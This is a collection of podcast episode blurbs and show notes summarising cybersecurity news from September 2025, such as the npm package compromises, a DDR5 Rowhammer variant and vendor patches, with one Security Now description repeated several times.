Consumer Reports on Windows 10 updates. Waste (not fraud or abuse) within DoD Cyberoperations. China's DeepSeek produces deliberately flawed code. WebAssembly v3.0 officially released. Firefox v143 updates and new features. Firefox for Android now offers DoH. A nearly terminal flaw in Microsoft's Entra ID. Chrome hits its 6th 0-day this year. Emergency update. DRAM (now DDR5) still vulnerable to RowHammer. SAMSUNG kitchen refrigerators begin showing ads. China says no to NVIDIA. 300 more (new) NPM maliciouspackages found and removed. The EU is already testing proper online age verification. Show Notes - https://www.grc.com/sn/SN-1044-Notes.pdf Hosts: Steve Gibson and Leo Laporte Download or subscribe to Security Now at https://twit.tv/shows/security-now. You can submit a question to Security Now at the GRC Feedback Page. For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: bigid.com/securitynow go.acronis.com/twit zscaler.com/security 1password.com/securitynow hoxhunt.com/securitynow

Distracting the Analyst for Fun and Profit Our undergraduate intern, Tyler House analyzed what may have been a small DoS attack that was likely more meant to distract than to actually cause a denial of service https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Distracting%20the%20Analyst%20for%20Fun%20and%20Profit/32308 GitHub s plan for a more secure npm supply chain GitHub outlined its plan to harden the supply chain, in particular in light of the recent attack against npm packages https://github.blog/security/supply-chain-security/our-plan-for-a-more-secure-npm-supply-chain/ SolarWinds Web Help Desk AjaxProxy Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVE-2025-26399) SolarWinds Web Help Desk was found to be susceptible to an unauthenticated AjaxProxy deserialization remote code execution vulnerability that, if exploited, would allow an attacker to run commands on the host machine. This vulnerability is a patch bypass of CVE-2024-28988, which in turn is a patch bypass of CVE-2024-28986. https://www.solarwinds.com/trust-center/security-advisories/cve-2025-26399 Vulnerabilities in Supermicro BMC Firmware CVE-2025-7937 CVE-2025-6198 Supermicro fixed two vulnerabilities that could allow an attacker to compromise the BMC with rogue firmware. https://www.supermicro.com/en/support/security_BMC_IPMI_Sept_2025

Consumer Reports on Windows 10 updates. Waste (not fraud or abuse) within DoD Cyberoperations. China's DeepSeek produces deliberately flawed code. WebAssembly v3.0 officially released. Firefox v143 updates and new features. Firefox for Android now offers DoH. A nearly terminal flaw in Microsoft's Entra ID. Chrome hits its 6th 0-day this year. Emergency update. DRAM (now DDR5) still vulnerable to RowHammer. SAMSUNG kitchen refrigerators begin showing ads. China says no to NVIDIA. 300 more (new) NPM maliciouspackages found and removed. The EU is already testing proper online age verification. Show Notes - https://www.grc.com/sn/SN-1044-Notes.pdf Hosts: Steve Gibson and Leo Laporte Download or subscribe to Security Now at https://twit.tv/shows/security-now. You can submit a question to Security Now at the GRC Feedback Page. For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: bigid.com/securitynow go.acronis.com/twit zscaler.com/security 1password.com/securitynow hoxhunt.com/securitynow

Consumer Reports on Windows 10 updates. Waste (not fraud or abuse) within DoD Cyberoperations. China's DeepSeek produces deliberately flawed code. WebAssembly v3.0 officially released. Firefox v143 updates and new features. Firefox for Android now offers DoH. A nearly terminal flaw in Microsoft's Entra ID. Chrome hits its 6th 0-day this year. Emergency update. DRAM (now DDR5) still vulnerable to RowHammer. SAMSUNG kitchen refrigerators begin showing ads. China says no to NVIDIA. 300 more (new) NPM maliciouspackages found and removed. The EU is already testing proper online age verification. Show Notes - https://www.grc.com/sn/SN-1044-Notes.pdf Hosts: Steve Gibson and Leo Laporte Download or subscribe to Security Now at https://twit.tv/shows/security-now. You can submit a question to Security Now at the GRC Feedback Page. For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: bigid.com/securitynow go.acronis.com/twit zscaler.com/security 1password.com/securitynow hoxhunt.com/securitynow

Consumer Reports on Windows 10 updates. Waste (not fraud or abuse) within DoD Cyberoperations. China's DeepSeek produces deliberately flawed code. WebAssembly v3.0 officially released. Firefox v143 updates and new features. Firefox for Android now offers DoH. A nearly terminal flaw in Microsoft's Entra ID. Chrome hits its 6th 0-day this year. Emergency update. DRAM (now DDR5) still vulnerable to RowHammer. SAMSUNG kitchen refrigerators begin showing ads. China says no to NVIDIA. 300 more (new) NPM maliciouspackages found and removed. The EU is already testing proper online age verification. Show Notes - https://www.grc.com/sn/SN-1044-Notes.pdf Hosts: Steve Gibson and Leo Laporte Download or subscribe to Security Now at https://twit.tv/shows/security-now. You can submit a question to Security Now at the GRC Feedback Page. For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: bigid.com/securitynow go.acronis.com/twit zscaler.com/security 1password.com/securitynow hoxhunt.com/securitynow

Nvidia is set to invest $100 billion in OpenAI as it works toward a gigawatt of new infrastructure per week, and GitHub is rolling out new security controls for NPM.Starring Jason Howell and Tom Merritt.Show notes found here. Hosted on Acast. See acast.com/privacy for more information.

A new self-replicating malware infects the NPM repository. Microsoft and Cloudflare disrupt a Phishing-as-a-Service platform. Researchers uncover a new Fancy Bear backdoor campaign. The VoidProxy phishing-as-a-service (PhaaS) platform targets Microsoft 365 and Google accounts. A British telecom says its ransomware recovery may stretch into November. A new Rowhammer attack variant targets DDR5 memory. Democrats warn proposed budget cuts could slash the FBI's cyber division staff by half at a heated Senate Judiciary Committee hearing. On our Industry Voices segment, we are joined by Abhishek Agrawal from Material security discussing challenges of securing the Google Workspace. Pompompurin heads to prison.  Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest On our Industry Voices segment, we are joined by Abhishek Agrawal, CEO and Co-Founder of Material Security, discussing challenges of securing the Google Workspace. You can hear Abhishek's full conversation here. Selected Reading Self-Replicating Worm Hits 180+ Software Packages (Krebs on Security) Microsoft disrupts the RaccoonO365 Phishing-as-a-Service operation, names alleged leader (Help Net Security) Fancy Bear attacks abuse Office macros, legitimate cloud services (SC Media) VoidProxy phishing operation targets Microsoft 365, Google accounts (SC Media) UK telco Colt's cyberattack recovery seeps into November (The Register) Ruh-roh. DDR5 memory vulnerable to new Rowhammer attack (The Register) Senators, FBI Director Patel clash over cyber division personnel, arrests (CyberScoop) House lawmakers move to extend two key cyber programs, for now (The Record) BreachForums founder caged after soft sentence overturned (The Register) Share your feedback. What do you think about CyberWire Daily? Please take a few minutes to share your thoughts with us by completing our brief listener survey. Thank you for helping us continue to improve our show. Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices

Why You Need Phishing-Resistant Authentication NOW. The recent compromise of a number of high-profile npmjs.com accounts has yet again shown how dangerous a simple phishing email can be. https://isc.sans.edu/diary/Why%20You%20Need%20Phishing%20Resistant%20Authentication%20NOW./32290 S1ngularity/nx Attackers Strike Again A second wave of attacks has hit over a hundred npm-related GitHub repositories. The updated payload implements a worm that propagates itself to other repositories. https://www.aikido.dev/blog/s1ngularity-nx-attackers-strike-again ChatGPT s Calendar Integration Can Be Exploited to Steal Emails ChatGPT s new MCP integration can be used, via prompt injection, to affect software connected to ChatGPT via MCP. https://www.linkedin.com/posts/eito-miyamura-157305121_we-got-chatgpt-to-leak-your-private-email-activity-7372306174253256704-xoX1/

Apple Updates Apple released major updates for all of its operating systems. In addition to new features, these updates patch 33 different vulnerabilities. https://isc.sans.edu/diary/Apple%20Updates%20Everything%20-%20iOS%20macOS%2026%20Edition/32286 Microsoft End of Life October 14th, support for Windows 10, Exchange 2016, and Exchange 2019 will end. https://support.microsoft.com/en-us/windows/windows-10-support-ends-on-october-14-2025-2ca8b313-1946-43d3-b55c-2b95b107f281#:~:text=As%20a%20reminder%2C%20Windows%2010,one%20that%20supports%20Windows%2011. https://techcommunity.microsoft.com/blog/exchange/t-9-months-exchange-server-2016-and-exchange-server-2019-end-of-support/4366605 Phishing Targeting Rust Developers Rust developers are reporting similar phishing emails as the emails causing the major NPM compromise last week. https://github.com/rust-lang/crates.io/discussions/11889#discussion-8886064 Samsung Patches 0-Day Samsung released its monthly updates for its flagship phones fixing, among other vulnerability, an already exploited 0-day. https://security.samsungmobile.com/securityUpdate.smsb

Show DescriptionDave's got a Whiskey related content warning, recent security vulnerabilities in NPM, challenges with password management, and the complexities of digital security. They delve into Google's antitrust issues and the dynamics of the browser market, before transitioning to innovations in CSS, including custom properties and functions. The conversation wraps up with thoughts on the future of CSS and web development. Listen on WebsiteLinks Whiskey Web and Whatnot: Web Development, Neat Storybook: Frontend workshop for UI development Largest NPM Compromise in History - Supply Chain Attack : r/programming We all dodged a bullet - Xe Iaso Post by @cabel.panic.com — Bluesky Special: One on One with a Hacker – ShopTalk 1Password Watchtower This 25-minute video is the most riveting sudoku puzzle you will ever watch | The Verge Many years on the job and I still don't get it. - daverupert.com if() - CSS | MDN CSS at-rule functions - CSS | MDN CSS color-scheme-dependent colors with light-dark() – Bram.us Matthias Ott

The crypto community once again is dodging digital landmines as Ledger’s CTO screams “stop those onchain transactions!” thanks to a sneaky NPM supply chain attack hitting over a billion downloads. That’s right, hackers are out here snatching crypto like it’s candy. Meanwhile, Bitcoin Hyper’s presale is going full supernova, Oracle’s AI cloud dreams are spiking their stock, and Trump Media is hoarding $6 billion in CRO tokens for Truth Social’s big flex. From Nasdaq’s $50M Gemini IPO bet to Worldcoin’s AI identity takeover, we’re unpacking it all with our signature badness. Grab your hardware wallet, strap in, or strap on if you are into that kind of thing, and jump on board for our bad news episode #789 of The Bad Crypto Podcast. Full Show Notes at: http://badco.in/789 SUBSCRIBE, RATE, & REVIEW: Apple Podcast: http://badco.in/itunes Google Podcasts: http://badco.in/google Spotify: http://badco.in/spotify Amazon Music: http://badco.in/amazon FREE NFTs when you JOIN THE BAD CRYPTO NIFTY CLUB at https://badcrypto.uncut.network FOLLOW US ON SOCIAL MEDIA: Twitter: @badcryptopod - @joelcomm - @teedubya Facebook: /BadCrypto - /JoelComm - /teedubyaw Facebook Mastermind Group: /BadCrypto LinkedIn: /in/joelcomm - /in/teedubya Instagram: @BadCryptoPodcast Email: badcryptopodcast[at]gmail[dot]com Phone: SEVEN-OH-8-88FIVE- 90THIRTY DISCLAIMER: Do your own due diligence and research. Joel Comm and Travis Wright are NOT FINANCIAL ADVISORS. We are sharing our journey with you as we learn more about this crazy little thing called cryptocurrency. We make NO RECOMMENDATIONS. Don't take anything we say as gospel. Do not come to our homes with pitchforks because you lost money by listening to us. We only share with you what we are learning and what we are investing it. We will never "pump or dump" any cryptocurrencies. Take what we say with a grain of salt. You must research this stuff on your own! Just know that we will always strive for RADICAL TRANSPARENCY with any show associations.Support the show: https://badcryptopodcast.comSee omnystudio.com/listener for privacy information.

Major npm compromise A number of high-profile npm libraries were compromised after developers fell for a phishing email. This compromise affected libraries with a total of hundreds of millions of downloads a week. https://bsky.app/profile/bad-at-computer.bsky.social/post/3lydioq5swk2y https://github.com/orgs/community/discussions/172738 https://github.com/chalk/chalk/issues/656#issuecomment-3266894253 https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised HTTP Request Signatures It looks like some search engines and AI bots are starting to use the HTTP request signature. This should make it easier to identify bot traffic. https://isc.sans.edu/diary/HTTP%20Request%20Signatures/32266